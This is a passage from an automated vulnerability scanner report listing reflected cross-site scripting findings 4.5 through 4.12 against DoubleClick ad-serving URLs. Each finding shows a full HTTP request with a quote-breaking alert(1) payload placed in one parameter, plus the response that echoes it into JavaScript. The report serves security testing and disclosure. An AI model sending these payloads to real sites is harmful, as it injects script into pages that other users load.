Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 17 Apr 2011 15:01:16 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7000

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
wBhM7B_CX0n4eicQAQARgBIOLUlQs4AFDD-vuwBmDJ7oOI8KPsEqABnLGo1wOyAQx3d3cuYXJ0by5jb226AQozMDB4MjUwX2FzyAEJ2gEmaHR0cDovL3d3dy5hcnRvLmNvbS9zZWN0aW9uL2xpbmtzaGFyZS-YAogYuAIYwAIFyAKUlpIZqAMB6AORBOgDlgn1AwACkEQcd9ac"-alert(1)-"804dc1ac7d6&num=1&sig=AGiWqtxmv1nB6aysugVlvVUh-ppva-IbiQ&client=ca-pub-1583174976551405&adurl=http%3a%2f%2fturbotax.intuit.com/affiliate/bbtretdm");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wm
...[SNIP]...
4.5. http://ad.doubleclick.net/adi/N5506.3159.GOOGLE/B5414667.2 [client parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5506.3159.GOOGLE/B5414667.2

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 89c50"-alert(1)-"67bab8d9fab was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5506.3159.GOOGLE/B5414667.2;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BWaHNlgCrTaXZB8WGlgfM8vT7DpSP2_wBhM7B_CX0n4eicQAQARgBIOLUlQs4AFDD-vuwBmDJ7oOI8KPsEqABnLGo1wOyAQx3d3cuYXJ0by5jb226AQozMDB4MjUwX2FzyAEJ2gEmaHR0cDovL3d3dy5hcnRvLmNvbS9zZWN0aW9uL2xpbmtzaGFyZS-YAogYuAIYwAIFyAKUlpIZqAMB6AORBOgDlgn1AwACkEQ&num=1&sig=AGiWqtxmv1nB6aysugVlvVUh-ppva-IbiQ&client=ca-pub-158317497655140589c50"-alert(1)-"67bab8d9fab&adurl=;ord=552835799? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1583174976551405&output=html&h=250&slotname=8101847403&w=300&ea=0&flash=10.2.154&url=http%3A%2F%2Fwww.arto.com%2Fsection%2Flinkshare%2F&dt=1303052439349&bpp=2&shv=r20110406&jsv=r20110412&correlator=1303052439353&frm=1&adk=593971540&ga_vid=1742950866.1303052439&ga_sid=1303052439&ga_hid=1800218750&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=2443789947&eid=33895132&fu=0&ifi=1&dtd=7
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 17 Apr 2011 15:01:45 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7000

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
5jb226AQozMDB4MjUwX2FzyAEJ2gEmaHR0cDovL3d3dy5hcnRvLmNvbS9zZWN0aW9uL2xpbmtzaGFyZS-YAogYuAIYwAIFyAKUlpIZqAMB6AORBOgDlgn1AwACkEQ&num=1&sig=AGiWqtxmv1nB6aysugVlvVUh-ppva-IbiQ&client=ca-pub-158317497655140589c50"-alert(1)-"67bab8d9fab&adurl=http%3a%2f%2fturbotax.intuit.com/affiliate/bbtretdm");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var
...[SNIP]...
4.6. http://ad.doubleclick.net/adi/N5506.3159.GOOGLE/B5414667.2 [num parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5506.3159.GOOGLE/B5414667.2

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ff2f0"-alert(1)-"b664736df25 was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5506.3159.GOOGLE/B5414667.2;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BWaHNlgCrTaXZB8WGlgfM8vT7DpSP2_wBhM7B_CX0n4eicQAQARgBIOLUlQs4AFDD-vuwBmDJ7oOI8KPsEqABnLGo1wOyAQx3d3cuYXJ0by5jb226AQozMDB4MjUwX2FzyAEJ2gEmaHR0cDovL3d3dy5hcnRvLmNvbS9zZWN0aW9uL2xpbmtzaGFyZS-YAogYuAIYwAIFyAKUlpIZqAMB6AORBOgDlgn1AwACkEQ&num=1ff2f0"-alert(1)-"b664736df25&sig=AGiWqtxmv1nB6aysugVlvVUh-ppva-IbiQ&client=ca-pub-1583174976551405&adurl=;ord=552835799? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1583174976551405&output=html&h=250&slotname=8101847403&w=300&ea=0&flash=10.2.154&url=http%3A%2F%2Fwww.arto.com%2Fsection%2Flinkshare%2F&dt=1303052439349&bpp=2&shv=r20110406&jsv=r20110412&correlator=1303052439353&frm=1&adk=593971540&ga_vid=1742950866.1303052439&ga_sid=1303052439&ga_hid=1800218750&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=2443789947&eid=33895132&fu=0&ifi=1&dtd=7
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 17 Apr 2011 15:01:26 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7000

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
_CX0n4eicQAQARgBIOLUlQs4AFDD-vuwBmDJ7oOI8KPsEqABnLGo1wOyAQx3d3cuYXJ0by5jb226AQozMDB4MjUwX2FzyAEJ2gEmaHR0cDovL3d3dy5hcnRvLmNvbS9zZWN0aW9uL2xpbmtzaGFyZS-YAogYuAIYwAIFyAKUlpIZqAMB6AORBOgDlgn1AwACkEQ&num=1ff2f0"-alert(1)-"b664736df25&sig=AGiWqtxmv1nB6aysugVlvVUh-ppva-IbiQ&client=ca-pub-1583174976551405&adurl=http%3a%2f%2fturbotax.intuit.com/affiliate/bbtretdm");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode =
...[SNIP]...
4.7. http://ad.doubleclick.net/adi/N5506.3159.GOOGLE/B5414667.2 [sig parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5506.3159.GOOGLE/B5414667.2

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 59253"-alert(1)-"0ba314982cd was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5506.3159.GOOGLE/B5414667.2;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BWaHNlgCrTaXZB8WGlgfM8vT7DpSP2_wBhM7B_CX0n4eicQAQARgBIOLUlQs4AFDD-vuwBmDJ7oOI8KPsEqABnLGo1wOyAQx3d3cuYXJ0by5jb226AQozMDB4MjUwX2FzyAEJ2gEmaHR0cDovL3d3dy5hcnRvLmNvbS9zZWN0aW9uL2xpbmtzaGFyZS-YAogYuAIYwAIFyAKUlpIZqAMB6AORBOgDlgn1AwACkEQ&num=1&sig=AGiWqtxmv1nB6aysugVlvVUh-ppva-IbiQ59253"-alert(1)-"0ba314982cd&client=ca-pub-1583174976551405&adurl=;ord=552835799? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1583174976551405&output=html&h=250&slotname=8101847403&w=300&ea=0&flash=10.2.154&url=http%3A%2F%2Fwww.arto.com%2Fsection%2Flinkshare%2F&dt=1303052439349&bpp=2&shv=r20110406&jsv=r20110412&correlator=1303052439353&frm=1&adk=593971540&ga_vid=1742950866.1303052439&ga_sid=1303052439&ga_hid=1800218750&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=2443789947&eid=33895132&fu=0&ifi=1&dtd=7
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 17 Apr 2011 15:01:35 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7000

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
I8KPsEqABnLGo1wOyAQx3d3cuYXJ0by5jb226AQozMDB4MjUwX2FzyAEJ2gEmaHR0cDovL3d3dy5hcnRvLmNvbS9zZWN0aW9uL2xpbmtzaGFyZS-YAogYuAIYwAIFyAKUlpIZqAMB6AORBOgDlgn1AwACkEQ&num=1&sig=AGiWqtxmv1nB6aysugVlvVUh-ppva-IbiQ59253"-alert(1)-"0ba314982cd&client=ca-pub-1583174976551405&adurl=http%3a%2f%2fturbotax.intuit.com/affiliate/bbtretdm");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallows
...[SNIP]...
4.8. http://ad.doubleclick.net/adi/N5506.3159.GOOGLE/B5414667.2 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5506.3159.GOOGLE/B5414667.2

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 28074"-alert(1)-"e33ce0f8330 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5506.3159.GOOGLE/B5414667.2;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l28074"-alert(1)-"e33ce0f8330&ai=BWaHNlgCrTaXZB8WGlgfM8vT7DpSP2_wBhM7B_CX0n4eicQAQARgBIOLUlQs4AFDD-vuwBmDJ7oOI8KPsEqABnLGo1wOyAQx3d3cuYXJ0by5jb226AQozMDB4MjUwX2FzyAEJ2gEmaHR0cDovL3d3dy5hcnRvLmNvbS9zZWN0aW9uL2xpbmtzaGFyZS-YAogYuAIYwAIFyAKUlpIZqAMB6AORBOgDlgn1AwACkEQ&num=1&sig=AGiWqtxmv1nB6aysugVlvVUh-ppva-IbiQ&client=ca-pub-1583174976551405&adurl=;ord=552835799? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1583174976551405&output=html&h=250&slotname=8101847403&w=300&ea=0&flash=10.2.154&url=http%3A%2F%2Fwww.arto.com%2Fsection%2Flinkshare%2F&dt=1303052439349&bpp=2&shv=r20110406&jsv=r20110412&correlator=1303052439353&frm=1&adk=593971540&ga_vid=1742950866.1303052439&ga_sid=1303052439&ga_hid=1800218750&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=2443789947&eid=33895132&fu=0&ifi=1&dtd=7
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 17 Apr 2011 15:01:07 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7000

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
= escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3aec/f/187/%2a/p%3B239614135%3B0-0%3B0%3B62445283%3B4307-300/250%3B41553595/41571382/1%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=l28074"-alert(1)-"e33ce0f8330&ai=BWaHNlgCrTaXZB8WGlgfM8vT7DpSP2_wBhM7B_CX0n4eicQAQARgBIOLUlQs4AFDD-vuwBmDJ7oOI8KPsEqABnLGo1wOyAQx3d3cuYXJ0by5jb226AQozMDB4MjUwX2FzyAEJ2gEmaHR0cDovL3d3dy5hcnRvLmNvbS9zZWN0aW9uL2xpbmtzaGFyZS-YAogYuAIY
...[SNIP]...
4.9. http://ad.doubleclick.net/adi/N5506.3159.GOOGLE/B5414667.3 [adurl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5506.3159.GOOGLE/B5414667.3

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 44f9b"-alert(1)-"e081a0b507f was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5506.3159.GOOGLE/B5414667.3;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BBA4fyLepTdTNGtud6Abe4J2CDtT-5fsBlMzB_CX0n4eicQAQARgBIL7O5Q04AFDD-vuwBmDJ7oOI8KPsEqABnLGo1wO6AQk3Mjh4OTBfYXPIAQnaAWBmaWxlOi8vL0M6L1VzZXJzL2NyYXdsZXIvRG9jdW1lbnRzL3hzcy1kb3JrLWxhd3llcnMtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctcG9jLWV4YW1wbGUtcmVwb3J0Lmh0bWyYApYGuAIYwAIFyAKUlpIZqAMB6APdBegDyQfoA7oC9QMCAADE&num=1&sig=AGiWqtwRAWa76RcukwEkQc-2T3--rwlfxw&client=ca-pub-4063878933780912&adurl=44f9b"-alert(1)-"e081a0b507f HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1302986276&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2FUsers%2Fcrawler%2FDocuments%2Fxss-dork-lawyers-cross-site-scripting-poc-example-report.html&dt=1302968274562&bpp=5&shv=r20110406&jsv=r20110412&correlator=1302968276072&frm=0&adk=1607234649&ga_vid=217450935.1302968278&ga_sid=1302968278&ga_hid=1316019502&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1063&bih=1000&eid=36815001&fu=0&ifi=1&dtd=6355&xpc=7QG1qV76FG&p=file%3A//
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7265
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 16 Apr 2011 15:40:05 GMT
Expires: Sat, 16 Apr 2011 15:40:05 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
xhd3llcnMtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctcG9jLWV4YW1wbGUtcmVwb3J0Lmh0bWyYApYGuAIYwAIFyAKUlpIZqAMB6APdBegDyQfoA7oC9QMCAADE&num=1&sig=AGiWqtwRAWa76RcukwEkQc-2T3--rwlfxw&client=ca-pub-4063878933780912&adurl=44f9b"-alert(1)-"e081a0b507fhttp://turbotax.intuit.com/affiliate/bbtretdm");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow =
...[SNIP]...
4.10. http://ad.doubleclick.net/adi/N5506.3159.GOOGLE/B5414667.3 [ai parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5506.3159.GOOGLE/B5414667.3

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 75837"-alert(1)-"704dcbf347f was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5506.3159.GOOGLE/B5414667.3;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BBA4fyLepTdTNGtud6Abe4J2CDtT-5fsBlMzB_CX0n4eicQAQARgBIL7O5Q04AFDD-vuwBmDJ7oOI8KPsEqABnLGo1wO6AQk3Mjh4OTBfYXPIAQnaAWBmaWxlOi8vL0M6L1VzZXJzL2NyYXdsZXIvRG9jdW1lbnRzL3hzcy1kb3JrLWxhd3llcnMtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctcG9jLWV4YW1wbGUtcmVwb3J0Lmh0bWyYApYGuAIYwAIFyAKUlpIZqAMB6APdBegDyQfoA7oC9QMCAADE75837"-alert(1)-"704dcbf347f&num=1&sig=AGiWqtwRAWa76RcukwEkQc-2T3--rwlfxw&client=ca-pub-4063878933780912&adurl=;ord=1349914408? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1302986276&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2FUsers%2Fcrawler%2FDocuments%2Fxss-dork-lawyers-cross-site-scripting-poc-example-report.html&dt=1302968274562&bpp=5&shv=r20110406&jsv=r20110412&correlator=1302968276072&frm=0&adk=1607234649&ga_vid=217450935.1302968278&ga_sid=1302968278&ga_hid=1316019502&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1063&bih=1000&eid=36815001&fu=0&ifi=1&dtd=6355&xpc=7QG1qV76FG&p=file%3A//
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 16 Apr 2011 15:38:36 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7283

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
6AQk3Mjh4OTBfYXPIAQnaAWBmaWxlOi8vL0M6L1VzZXJzL2NyYXdsZXIvRG9jdW1lbnRzL3hzcy1kb3JrLWxhd3llcnMtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctcG9jLWV4YW1wbGUtcmVwb3J0Lmh0bWyYApYGuAIYwAIFyAKUlpIZqAMB6APdBegDyQfoA7oC9QMCAADE75837"-alert(1)-"704dcbf347f&num=1&sig=AGiWqtwRAWa76RcukwEkQc-2T3--rwlfxw&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fturbotax.intuit.com/affiliate/bbtretdm");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wm
...[SNIP]...
4.11. http://ad.doubleclick.net/adi/N5506.3159.GOOGLE/B5414667.3 [client parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5506.3159.GOOGLE/B5414667.3

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b6772"-alert(1)-"80ae9066ab0 was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5506.3159.GOOGLE/B5414667.3;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BBA4fyLepTdTNGtud6Abe4J2CDtT-5fsBlMzB_CX0n4eicQAQARgBIL7O5Q04AFDD-vuwBmDJ7oOI8KPsEqABnLGo1wO6AQk3Mjh4OTBfYXPIAQnaAWBmaWxlOi8vL0M6L1VzZXJzL2NyYXdsZXIvRG9jdW1lbnRzL3hzcy1kb3JrLWxhd3llcnMtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctcG9jLWV4YW1wbGUtcmVwb3J0Lmh0bWyYApYGuAIYwAIFyAKUlpIZqAMB6APdBegDyQfoA7oC9QMCAADE&num=1&sig=AGiWqtwRAWa76RcukwEkQc-2T3--rwlfxw&client=ca-pub-4063878933780912b6772"-alert(1)-"80ae9066ab0&adurl=;ord=1349914408? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1302986276&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2FUsers%2Fcrawler%2FDocuments%2Fxss-dork-lawyers-cross-site-scripting-poc-example-report.html&dt=1302968274562&bpp=5&shv=r20110406&jsv=r20110412&correlator=1302968276072&frm=0&adk=1607234649&ga_vid=217450935.1302968278&ga_sid=1302968278&ga_hid=1316019502&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1063&bih=1000&eid=36815001&fu=0&ifi=1&dtd=6355&xpc=7QG1qV76FG&p=file%3A//
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 16 Apr 2011 15:39:51 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7283

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
kb3JrLWxhd3llcnMtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctcG9jLWV4YW1wbGUtcmVwb3J0Lmh0bWyYApYGuAIYwAIFyAKUlpIZqAMB6APdBegDyQfoA7oC9QMCAADE&num=1&sig=AGiWqtwRAWa76RcukwEkQc-2T3--rwlfxw&client=ca-pub-4063878933780912b6772"-alert(1)-"80ae9066ab0&adurl=http%3a%2f%2fturbotax.intuit.com/affiliate/bbtretdm");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var
...[SNIP]...
4.12. http://ad.doubleclick.net/adi/N5506.3159.GOOGLE/B5414667.3 [num parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5506.3159.GOOGLE/B5414667.3

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 62c53"-alert(1)-"9354907b3e was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5506.3159.GOOGLE/B5414667.3;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BBA4fyLepTdTNGtud6Abe4J2CDtT-5fsBlMzB_CX0n4eicQAQARgBIL7O5Q04AFDD-vuwBmDJ7oOI8KPsEqABnLGo1wO6AQk3Mjh4OTBfYXPIAQnaAWBmaWxlOi8vL0M6L1VzZXJzL2NyYXdsZXIvRG9jdW1lbnRzL3hzcy1kb3JrLWxhd3llcnMtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctcG9jLWV4YW1wbGUtcmVwb3J0Lmh0bWyYApYGuAIYwAIFyAKUlpIZqAMB6APdBegDyQfoA7oC9QMCAADE&num=162c53"-alert(1)-"9354907b3e&sig=AGiWqtwRAWa76RcukwEkQc-2T3--rwlfxw&client=ca-pub-4063878933780912&adurl=;ord=1349914408? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1302986276&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2FUsers%2Fcrawler%2FDocuments%2Fxss-dork-lawyers-cross-site-scripting-poc-example-report.html&dt=1302968274562&bpp=5&shv=r20110406&jsv=r20110412&correlator=1302968276072&frm=0&adk=1607234649&ga_vid=217450935.1302968278&ga_sid=1302968278&ga_hid=1316019502&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1063&bih=1000&eid=36815001&fu=0&ifi=1&dtd=6355&xpc=7QG1qV76FG&p=file%3A//
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 16 Apr 2011 15:38:58 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7279

